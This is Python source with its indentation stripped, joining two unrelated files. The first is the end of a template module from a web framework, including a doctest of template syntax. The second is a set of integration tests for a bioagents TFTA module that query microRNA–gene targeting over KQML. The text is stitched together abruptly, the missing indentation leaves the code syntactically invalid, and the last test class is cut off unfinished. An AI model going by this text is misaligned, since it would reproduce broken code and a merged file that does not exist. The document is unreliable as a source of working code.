def __str__(self):
return self["__body__"].encode('utf-8')
def __repr__(self):
self["__body__"] # initialize __body__ if not already initialized
return "<TemplateResult: %s>" % dict.__repr__(self)
def test():
r"""Doctest for testing template module.
Define a utility function to run template test.
>>> class TestResult:
... def __init__(self, t): self.t = t
... def __getattr__(self, name): return getattr(self.t, name)
... def __repr__(self): return repr(unicode(self))
...
>>> def t(code, **keywords):
... tmpl = Template(code, **keywords)
... return lambda *a, **kw: TestResult(tmpl(*a, **kw))
...
Simple tests.
>>> t('1')()
u'1\n'
>>> t('$def with ()\n1')()
u'1\n'
>>> t('$def with (a)\n$a')(1)
u'1\n'
>>> t('$def with (a=0)\n$a')(1)
u'1\n'
>>> t('$def with (a=0)\n$a')(a=1)
u'1\n'
Test complicated expressions.
>>> t('$def with (x)\n$x.upper()')('hello')
u'HELLO\n'
>>> t('$(2 * 3 + 4 * 5)')()
u'26\n'
>>> t('${2 * 3 + 4 * 5}')()
u'26\n'
>>> t('$def with (limit)\nkeep $(limit)ing.')('go')
u'keep going.\n'
>>> t('$def with (a)\n$a.b[0]')(storage(b=[1]))
u'1\n'
Test html escaping.
>>> t('$def with (x)\n$x', filename='a.html')('<html>')
u'&lt;html&gt;\n'
>>> t('$def with (x)\n$x', filename='a.txt')('<html>')
u'<html>\n'
Test if, for and while.
>>> t('$if 1: 1')()
u'1\n'
>>> t('$if 1:\n 1')()
u'1\n'
>>> t('$if 1:\n 1\\')()
u'1'
>>> t('$if 0: 0\n$elif 1: 1')()
u'1\n'
>>> t('$if 0: 0\n$elif None: 0\n$else: 1')()
u'1\n'
>>> t('$if 0 < 1 and 1 < 2: 1')()
u'1\n'
>>> t('$for x in [1, 2, 3]: $x')()
u'1\n2\n3\n'
>>> t('$def with (d)\n$for k, v in d.iteritems(): $k')({1: 1})
u'1\n'
>>> t('$for x in [1, 2, 3]:\n\t$x')()
u' 1\n 2\n 3\n'
>>> t('$def with (a)\n$while a and a.pop():1')([1, 2, 3])
u'1\n1\n1\n'
The space after : must be ignored.
>>> t('$if True: foo')()
u'foo\n'
Test loop.xxx.
>>> t("$for i in range(5):$loop.index, $loop.parity")()
u'1, odd\n2, even\n3, odd\n4, even\n5, odd\n'
>>> t("$for i in range(2):\n $for j in range(2):$loop.parent.parity $loop.parity")()
u'odd odd\nodd even\neven odd\neven even\n'
Test assignment.
>>> t('$ a = 1\n$a')()
u'1\n'
>>> t('$ a = [1]\n$a[0]')()
u'1\n'
>>> t('$ a = {1: 1}\n$a.keys()[0]')()
u'1\n'
>>> t('$ a = []\n$if not a: 1')()
u'1\n'
>>> t('$ a = {}\n$if not a: 1')()
u'1\n'
>>> t('$ a = -1\n$a')()
u'-1\n'
>>> t('$ a = "1"\n$a')()
u'1\n'
Test comments.
>>> t('$# 0')()
u'\n'
>>> t('hello$#comment1\nhello$#comment2')()
u'hello\nhello\n'
>>> t('$#comment0\nhello$#comment1\nhello$#comment2')()
u'\nhello\nhello\n'
Test unicode.
>>> t('$def with (a)\n$a')(u'\u203d')
u'\u203d\n'
>>> t('$def with (a)\n$a')(u'\u203d'.encode('utf-8'))
u'\u203d\n'
>>> t(u'$def with (a)\n$a $:a')(u'\u203d')
u'\u203d \u203d\n'
>>> t(u'$def with ()\nfoo')()
u'foo\n'
>>> def f(x): return x
...
>>> t(u'$def with (f)\n$:f("x")')(f)
u'x\n'
>>> t('$def with (f)\n$:f("x")')(f)
u'x\n'
Test dollar escaping.
>>> t("Stop, $$money isn't evaluated.")()
u"Stop, $money isn't evaluated.\n"
>>> t("Stop, \$money isn't evaluated.")()
u"Stop, $money isn't evaluated.\n"
Test space sensitivity.
>>> t('$def with (x)\n$x')(1)
u'1\n'
>>> t('$def with(x ,y)\n$x')(1, 1)
u'1\n'
>>> t('$(1 + 2*3 + 4)')()
u'11\n'
Make sure globals are working.
>>> t('$x')()
Traceback (most recent call last):
...
NameError: global name 'x' is not defined
>>> t('$x', globals={'x': 1})()
u'1\n'
Can't change globals.
>>> t('$ x = 2\n$x', globals={'x': 1})()
u'2\n'
>>> t('$ x = x + 1\n$x', globals={'x': 1})()
Traceback (most recent call last):
...
UnboundLocalError: local variable 'x' referenced before assignment
Make sure builtins are customizable.
>>> t('$min(1, 2)')()
u'1\n'
>>> t('$min(1, 2)', builtins={})()
Traceback (most recent call last):
...
NameError: global name 'min' is not defined
Test vars.
>>> x = t('$var x: 1')()
>>> x.x
u'1'
>>> x = t('$var x = 1')()
>>> x.x
1
>>> x = t('$var x: \n foo\n bar')()
>>> x.x
u'foo\nbar\n'
Test BOM chars.
>>> t('\xef\xbb\xbf$def with(x)\n$x')('foo')
u'foo\n'
Test for with weird cases.
>>> t('$for i in range(10)[1:5]:\n $i')()
u'1\n2\n3\n4\n'
>>> t("$for k, v in {'a': 1, 'b': 2}.items():\n $k $v")()
u'a 1\nb 2\n'
>>> t("$for k, v in ({'a': 1, 'b': 2}.items():\n $k $v")()
Traceback (most recent call last):
...
SyntaxError: invalid syntax
Test datetime.
>>> import datetime
>>> t("$def with (date)\n$date.strftime('%m %Y')")(datetime.datetime(2009, 1, 1))
u'01 2009\n'
"""
pass
if __name__ == "__main__":
import sys
if '--compile' in sys.argv:
compile_templates(sys.argv[2])
else:
import doctest
doctest.testmod()
from kqml import KQMLList, KQMLString
from tfta.tfta import TFTA
from tfta.tfta_module import TFTA_Module
from bioagents.tests.util import ekb_from_text, ekb_kstring_from_text, \
get_request, agent_clj_from_text
from bioagents.tests.integration import _IntegrationTest, _FailureTest
from indra.sources.trips.processor import TripsProcessor
from indra.statements import Agent
from bioagents import Bioagent
from indra.sources import trips
import re
#####################################
# Testing the following TFTA capabilities
# IS-MIRNA-TARGET
# FIND-TARGET-MIRNA
# FIND-MIRNA-TARGET
# FIND-GENE-COUNT-MIRNA
# FIND-MIRNA-COUNT-GENE
# FIND-TF-MIRNA
# FIND-EVIDENCE-MIRNA-TARGET
#
######################################
def _get_targets(target_arg):
proteins = None
family = None
agents = Bioagent.get_agent(target_arg)
if isinstance(agents, list):
proteins = [a.name for a in agents if a is not None and ('UP' in a.db_refs or 'HGNC' in a.db_refs)]
family = [a.name for a in agents if a is not None and 'FPLX' in a.db_refs and a.name not in proteins]
elif isinstance(agents, Agent):
if 'UP' in agents.db_refs or 'HGNC' in agents.db_refs:
proteins = [agents.name]
if not proteins and 'FPLX' in agents.db_refs:
family = [agents.name]
if proteins:
print('genes=', ','.join(proteins))
else:
print('Genes = None\n')
if family:
print('family=', ','.join(family))
else:
print('family = None\n')
return proteins, family
def agents_clj_from_text(text):
ekb_xml = ekb_from_text(text)
tp = trips.process_xml(ekb_xml)
agents = tp.get_agents()
clj = Bioagent.make_cljson(agents)
return clj
def get_mirnas(mir_arg):
mirna = []
try:
agents = Bioagent.get_agent(mir_arg)
except Exception:
return []
if isinstance(agents, list):
mirna = [_get_mirna_name(a.name) for a in agents if a is not None]
elif isinstance(agents, Agent):
mirna = [_get_mirna_name(agents.name)]
if mirna:
print('mirna=', ','.join(mirna))
else:
print('mirna = None')
return mirna
def _get_mirna_name(str1):
#handle two forms of input, like MIR-PUNC-MINUS-20-B-PUNC-MINUS-5-P and MIR-20-B-5-P
if 'PUNC-MINUS' in str1:
str2 = str1.replace('-PUNC-MINUS-','_')
str2 = str2.replace('-','')
str2 = str2.replace('_', '-')
return str2.upper()
else:
plist = re.findall('([0-9]+-[a-zA-Z])', str1)
s = str1
for p in plist:
p1 = p.replace('-','')
s = s.replace(p, p1)
return s.upper()
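# Hedged illustration (not part of the original tests): both spellings
# described above normalize to the same miRNA name.
def _demo_mirna_name():
    assert _get_mirna_name('MIR-PUNC-MINUS-20-B-PUNC-MINUS-5-P') == 'MIR-20B-5P'
    assert _get_mirna_name('MIR-20-B-5-P') == 'MIR-20B-5P'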
#Bypass TRIPS grounding here, since it misinterprets some microRNA names
def make_mirna_cljson(mir_str):
mir_str = mir_str.replace(' ', '')
mir_list = mir_str.split(',')
mir_agent = [Agent(mir) for mir in mir_list]
mir_json = Bioagent.make_cljson(mir_agent)
return mir_json
#############################################################################
# IS-MIRNA-TARGET
#Does miR-20b-5p target STAT3? (subtask: is-mirna-target)
class TestIsMirnaTarget1(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
mirna = agent_clj_from_text('miR-20b-5p')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
assert output.get('is-miRNA-target') == 'TRUE', output
#protein family
#Does miR-20b-5p target MEK? (subtask: is-mirna-target)
class TestIsMirnaTarget2(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('MEK')
mirna = agent_clj_from_text('miR-20b-5p')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
assert len(output.get('clarification')) == 5, output
#clarification test
#Does miR-200c target STAT3? (subtask: is-mirna-target)
class TestIsMirnaTarget3(_IntegrationTest):
def __init__(self, *args):
super(TestIsMirnaTarget3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
mirna = agent_clj_from_text('miR-200c')
agents = Bioagent.get_agent(mirna)
print('name=', agents.name)
print('db_refs=', agents.db_refs)
content = KQMLList('IS-MIRNA-TARGET')
content.set('target', target)
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
####################################################################################
#FIND-TARGET-MIRNA
#What genes does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 917, output
#What genes are regulated by miR-297? (subtask: find-target-mirna)
class TestFindTargetMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-297')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 190, output
#What genes are regulated by miR-20b-5p and MIR-29B-1-5P? (subtask: find-target-mirna)
class TestFindTargetMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-20b-5p, MIR-29B-1-5P')
print("mirna=", mirna)
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 12, output
#What are the genes that have strong evidence of being regulated by mir-122-5p? (subtask: find-target-mirna)
class TestFindTargetMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-122-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'strong')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 69, output
#What are the genes that have weak evidence of being regulated by mir-122-5p? (subtask: find-target-mirna)
class TestFindTargetMirna5(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna5, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-122-5p')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 556, output
#clarification test
#What are the genes that have weak evidence of being regulated by mir-128? (subtask: find-target-mirna)
class TestFindTargetMirna6(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna6, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('mir-128')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("output.get('reason') = ", output.get('reason'))
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 3, output
#What genes are regulated by miR-200C? (subtask: find-target-mirna)
class TestFindTargetMirna7(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna7, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200C')
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("output.get('reason') = ", output.get('targets'))
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
#Which of those genes does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna8(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna8, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-20b-5p')
of_those = agents_clj_from_text("STAT3, SRF, HRAS, KRAS, ELK1, JAK1, JAK2, FOS")
_get_targets(of_those)
print('target=', str(of_those))
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
assert len(output.get('targets')) == 2, output
#What are the genes that have weak evidence of being regulated by mir-122-5p? (subtask: find-target-mirna)
class TestFindTargetMirna9(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna9, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('mir-122-5p')
of_those = agents_clj_from_text("STAT3, SRF, CDK4, CDK19, CSRP1, DZIP1L, HSPA4L")
_get_targets(of_those)
print('target=', str(of_those))
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('strength', 'weak')
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets')) = ", len(output.get('targets')))
assert len(output.get('targets')) == 5, output
#test target-type
#What kinases does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna10(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna10, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
target_type = 'kinase'
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('target-type', target_type)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 40, output
#What transcription factors does miR-20b-5p target? (subtask: find-target-mirna)
class TestFindTargetMirna11(_IntegrationTest):
def __init__(self, *args):
super(TestFindTargetMirna11, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = agent_clj_from_text('miR-20b-5p')
target_type = 'transcription factor'
content = KQMLList('FIND-TARGET-MIRNA')
content.set('miRNA', mirna)
content.set('target-type', target_type)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", len(output.get('targets')))
assert len(output.get('targets')) == 130, output
######################################################################################
#FIND-MIRNA-TARGET
#What microRNAs target STAT3? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('STAT3')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 80, output
#What microRNAs target il2? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('il2')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 5, output
##What microRNAs target MEK? (subtask: FIND-MIRNA-TARGET)
class TestFindMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('MEK')
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
assert len(output.get('clarification')) == 5, output
#test of-those
#Which of those mirnas target il2?
class TestFindMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('il2')
of_those = agents_clj_from_text('miR-20b-5p, miR-125b-5p, miR-337-3p, miR-155-5p, miR-877-3p, miR-181c-5p, miR-503-3p')
get_mirnas(of_those)
print(of_those)
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 2, output
#Which of those mirnas also target stat3? (use output from what micrornas target il2?)
class TestFindMirna5(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirna5, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agent_clj_from_text('stat3')
of_those = agents_clj_from_text('miR-181c-5p, miR-484, MIR-155-5p, let-7i-5p, miR-503-3p')
get_mirnas(of_those)
print(of_those)
content = KQMLList('FIND-MIRNA-TARGET')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 1, output
#####################################################################################
#FIND-GENE-COUNT-MIRNA
##What genes are most frequently regulated by miR-335-5p, miR-155-5p, miR-145-5p, and miR-20a-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p, miR-20a-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#What genes are most frequently regulated by miR-335-5p, miR-155-5p and miR-145-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#clarification
#What genes are most frequently regulated by miR-122, miR-200c, and miR-20a-5p?
class TestFindGeneCountMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-122, miR-200c, miR-20a-5p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
print("len(output.get('clarification').get('as'))=",len(output.get('clarification').get('as')))
assert len(output.get('clarification').get('as')) == 2, output
#subsequent query
#Which of those genes are most frequently regulated by miR-335-5p, miR-155-5p, miR-145-5p, and miR-20a-5p?
#(subtask: FIND-GENE-COUNT-MIRNA)
class TestFindGeneCountMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindGeneCountMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-335-5p, miR-155-5p, miR-145-5p, miR-20a-5p')
of_those = agents_clj_from_text('stat3,srf,hras,CDK19, HSPA4L,FOXRED2,ZBTB25,cd28,sp4,TNKS2')
content = KQMLList('FIND-GENE-COUNT-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('targets'))=", str(len(output.get('targets'))))
assert len(output.get('targets')) == 30, output
#######################################################################################
##FIND-MIRNA-COUNT-GENE
#What miRNAs most frequently regulate EGFR, SRF, STAT3, JAK2, and SMAD3?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene1(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, SRF, STAT3, JAK2, SMAD3')
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 23, output
#which of those miRNAs most frequently regulate EGFR, SRF, STAT3, JAK2, and SMAD3?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene2(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, SRF, STAT3, JAK2, SMAD3')
of_those = make_mirna_cljson('miR-200a-3p,miR-125b-5p, miR-29b-1-5p, miR-16-5p, miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(of_those)
print('of_those=', of_those)
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('miRNAs'))=", len(output.get('miRNAs')))
assert len(output.get('miRNAs')) == 7, output
#which of those miRNAs most frequently regulate EGFR, and AKT?
#(subtask: FIND-MIRNA-COUNT-GENE)
class TestFindMirnaCountGene3(_IntegrationTest):
def __init__(self, *args):
super(TestFindMirnaCountGene3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
target = agents_clj_from_text('EGFR, AKT')
of_those = make_mirna_cljson('miR-200a-3p,miR-125b-5p, miR-29b-1-5p, miR-16-5p, miR-335-5p, miR-155-5p, miR-145-5p')
get_mirnas(of_those)
print('of_those=', of_those)
content = KQMLList('FIND-MIRNA-COUNT-GENE')
content.set('target', target)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
print("len(output.get('clarification').get('as'))=", len(output.get('clarification').get('as')))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 3, output
####################################################################################
# FIND-TF-MIRNA
##what transcription factors does miR-124-3p regulate?
class TestFindTfMirna1(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-124-3p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 156, output
##what transcription factors does miR-200c regulate?
class TestFindTfMirna2(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
print("len(output.get('clarification'))=", str(len(output.get('clarification'))))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 2, output
##what transcription factors does miR-200c-3p regulate?
class TestFindTfMirna3(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna3, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c-3p')
get_mirnas(mirna)
print('mirna=', mirna)
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 39, output
#subsequent query
##which of these transcription factors does miR-200c-3p regulate?
class TestFindTfMirna4(_IntegrationTest):
def __init__(self, *args):
super(TestFindTfMirna4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-200c-3p')
get_mirnas(mirna)
print('mirna=', mirna)
of_those = agents_clj_from_text('ATRX, DNMT3B, MBD5,stat3,ZMAT3')
content = KQMLList('FIND-TF-MIRNA')
content.set('miRNA', mirna)
content.set('of-those', of_those)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('tfs'))=", str(len(output.get('tfs'))))
assert len(output.get('tfs')) == 3, output
###################################################################################
# FIND-EVIDENCE-MIRNA-TARGET
#show me evidence that miR-148a-3p targets DNMT1?
class TestFindEvidenceMirnaTarget1(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget1, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a-3p')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'SUCCESS', output
print("len(output.get('evidence'))=", len(output.get('evidence')))
assert len(output.get('evidence')) == 7, output
#clarification
#show me evidence that miR-148a targets DNMT1?
class TestFindEvidenceMirnaTarget2(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget2, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'MIRNA_NOT_FOUND', output
assert len(output.get('clarification').get('as')) == 2, output
#show me evidence that miR-148 targets DNMT1?
class TestFindEvidenceMirnaTarget3(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget3, self).__init__(TFTA_Module)
def create_message(self):
